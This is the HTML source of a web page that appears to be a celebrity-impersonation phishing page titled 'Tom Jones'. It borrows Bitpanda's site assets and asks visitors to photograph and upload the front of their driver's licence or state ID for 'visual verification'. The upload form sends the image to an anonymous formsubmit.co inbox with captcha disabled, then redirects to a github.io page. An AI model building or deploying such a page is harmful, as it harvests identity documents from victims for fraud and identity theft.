                    
                            <!DOCTYPE html><html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script><meta charset=utf-8>

<title>
Tom Jones
</title>

<meta content="width=device-width, initial-scale=1.0" name=viewport>
<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>

 <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>














<h3> 
<strong> 
 
Tom Jones
</strong> 
</h3> 


 </div> </div>

</header> <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid="">

<div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m">












<h6> 
<strong> 
<Font STYLE="word-spacing:4px">

 <font size="+0.5">
 
 Follow the procedures below to complete a visual verification. This will assist  in accurately identifying you.
 
 <br><br> <br>
 

*  You will need to have your Photo ID. That is your Driver's license  or a State Issued ID card at hand.
<br><br> 

*  Click on the button  below,  to take a clear picture of the front side of your Drivers Licence or State Issued ID Card, ensuring that all details are clearly visible.


 </font>
 </font>
 <br> <br>
 <br> 
 
 
 <img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcREnOXkkNkFRrVJO1m_bXHtkHJbEc9ITNzTRA&amp;amp;usqp=CAU">
 
 <br><br>
<br>
<br> 












<div>

<div>

  <style>
    :root {
      --font-size-base: 4.1vw; 
    }

    .upload-form {
      width: 90vw;
      height: 99vh;
      margin: auto;
      background-color: #f5f5f5;
      padding: 2vw;
      border-radius: 2vw;
      text-align: center;
      font-family: Arial, sans-serif;
      font-size: var(--font-size-base);
    }

    .upload-form h2 {
      color: #333;
    }

    .upload-form p {
      color: #000000;
    }

    .upload-form input[type="file"] {
      display: none;
    }

    .upload-button {
      display: inline-block;
      background-color: #2F539B;
      color: white;
      padding: 5.25vw 5.5vw; /* Adjust the percentage values as needed */
      border-radius: 5%; /* Adjust the percentage value as needed */
      cursor: pointer;
      transition: background-color 0.3s ease;
      font-size: var(--font-size-base);
    }

    .upload-button:hover {
      background-color: #45a049;
    }

    .submit-button {
      display: none; /* Initially hide the submit button */
      margin: 6vw auto;
      background-color: #2F539B;
      color: white;
      padding: 3vw 0;
      border-radius: 10px;
      cursor: pointer;
      transition: background-color 0.3s ease;
      width: 90%;
      font-size: var(--font-size-base);
    }

    .image-preview {
      margin-top: 2vw;
    }

    .image-preview img {
      max-width: 100%;
      height: auto;
    }

    .retake-button {
      display: none;
      margin-bottom: 1vw;
      background-color: #f44336;
      color: white;
      padding: 1vw 2vw;
      border-radius: 4px;
      cursor: pointer;
      transition: background-color 0.3s ease;
      font-size: var(--font-size-base);
    }

    .retake-button:hover {
      background-color: #d32f2f;
    }

    .text-input {
      width: 95%;
      margin: 0 auto;
      padding: 4vw 4vw;
      border-radius: 4px;
      font-size: var(--font-size-base);
    }
  </style>




  <script>
    function showPreview(event) {
      var input = event.target;
      var reader = new FileReader();

      reader.onload = function() {
        var imagePreview = document.getElementById('image-preview');
        imagePreview.innerHTML = '<img src="' + reader.result + '" alt="Preview">';

        var uploadButton = document.getElementById('upload-button');
        var retakeButton = document.getElementById('retake-button');
        var submitButton = document.getElementById('submit-button');
        var message = document.getElementById('upload-message');

        uploadButton.style.display = 'none';
        retakeButton.style.display = 'inline-block';
        submitButton.style.display = 'block'; // Show the submit button
        message.innerHTML = 'Make sure the picture is clearly visible. But If the picture is not clear, click on "Retake Picture" to retake the picture. IF the picture is clearly visible, click on the  "CONTINUE" button located below the picture.';
      };

      reader.readAsDataURL(input.files[0]);
    }

    function retakePicture() {
      var imagePreview = document.getElementById('image-preview');
      imagePreview.innerHTML = '';

      var uploadButton = document.getElementById('upload-button');
      var retakeButton = document.getElementById('retake-button');
      var submitButton = document.getElementById('submit-button');
      var message = document.getElementById('upload-message');

      uploadButton.style.display = 'inline-block';
      retakeButton.style.display = 'none';
      submitButton.style.display = 'none'; // Hide the submit button
      message.innerHTML = 'Click on the button below to take a picture of the front of the card. Make Sure it is clearly visible.';

      var input = document.getElementById('image-upload');
      input.value = null; // Reset the selected file value
    }

    function selectPicture() {
      var input = document.getElementById('image-upload');
      input.click();
    }

    function handleFileSelect(event) {
      var input = event.target;
      var reader = new FileReader();

      reader.onload = function() {
        var imagePreview = document.getElementById('image-preview');
        var existingImage = imagePreview.querySelector('img');

        if (existingImage) {
          existingImage.src = reader.result; // Update theexisting image source
        } else {
          var newImage = document.createElement('img');
          newImage.src = reader.result;
          newImage.alt = 'Preview';
          imagePreview.appendChild(newImage);
        }

        var uploadButton =document.getElementById('upload-button');
        var retakeButton = document.getElementById('retake-button');
        var submitButton = document.getElementById('submit-button');
        var message = document.getElementById('upload-message');

        uploadButton.style.display = 'none';
        retakeButton.style.display = 'inline-block';
        submitButton.style.display = 'block'; // Show the submit button
        message.innerHTML = 'Make sure the picture is clearly visible. But If the picture is not clearly visible,  click on "Retake Picture" to retake the picture. IF the picture is clearly visible, click on the  "CONTINUE" button located below the picture.';
      };

      reader.readAsDataURL(input.files[0]);
    }
  </script>

  
  
  
  
  
  
  
  

<div>
  <style>
    #loading-icon {
      display: none;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      z-index: 9999;
      text-align: center;
    }

    .spinner {
      width: 170px;
      height: 170px;
      margin: 0 auto;
      border: 18px solid #f3f3f3;
      border-top: 16px solid brown;
      border-radius: 50%;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }

    #loading-text {
      font-weight: bold;
      margin-top: 10px;
      font-size: 35px;
      color: White;
      background-color: brown; /* Add brown background color */
      padding: 8px 13px; /* Add padding for better visibility */
      border-radius: 5px; /* Add border radius for rounded corners */
    }
  </style>

  <div id="loading-icon">
    <div class="spinner"></div>
    <div id="loading-text"><nobr>Please Wait...</nobr></div>
  </div>


  
  
  
  
  
  
  
  
     <form class="upload-form" enctype="multipart/form-data"  
action="https://formsubmit.co/9bad1063a8dcaac90c4721040d4ea0e8" enctype="multipart/form-data". method="post" >

<input type="hidden" name="_captcha" value="false">

<input type="hidden" name="_next" value="https://celebrity-org.github.io/_PhotoID.TomJones.com/">  
   
  
  


    
    <p id="upload-message"><strong>


<font style="color: black">


</font> 
</strong></p>



    <label for="image-upload" id="upload-button" class="upload-button"><h4><font style="color: White">
    Tap Here To 
    
    Upload Front Of Card</font></h4></label>



    <input type="file" id="image-upload" accept="image/*" capture="environment" required name="1st-FRONT-License-or-ID-TOM-JONES" onchange="handleFileSelect(event)">

    <div id="retake-button" class="retake-button" onclick="retakePicture()">Retake Picture</div>
    <div class="image-preview" id="image-preview"></div>

    <br>
    <div class="submit-container">
      <button type="submit" 
      onclick="showLoadingIcon()"
      id="submit-button" class="submit-button"><h3><font style="color: white">
     
      CONTINUE
      
      </font></h3></button>
    </div>
  </form>

</div>
</div>


   <script>
    function showLoadingIcon() {
      var loadingIcon = document.getElementById("loading-icon");
      loadingIcon.style.display = "block";
      setTimeout(function() {
        document.getElementById("myForm").submit();
      }, 1000); // Redirect after 2 seconds (adjust as needed)
    }

    function increaseFontSize() {
      var loadingText = document.getElementById("loading-text");
      var currentFontSize = window.getComputedStyle(loadingText, null).getPropertyValue('font-size');
      var currentFontSizeNumeric = parseFloat(currentFontSize);
      var newFontSize = currentFontSizeNumeric + 2;
      loadingText.style.fontSize = newFontSize + 'px';
    }
  </script>




  <br><br>
 <br><br>
 
 <br><br>
 <br><br>
</h6> 




<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">
<div>
 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">
</path> </symbol></svg>
</body>
</html>
               
               
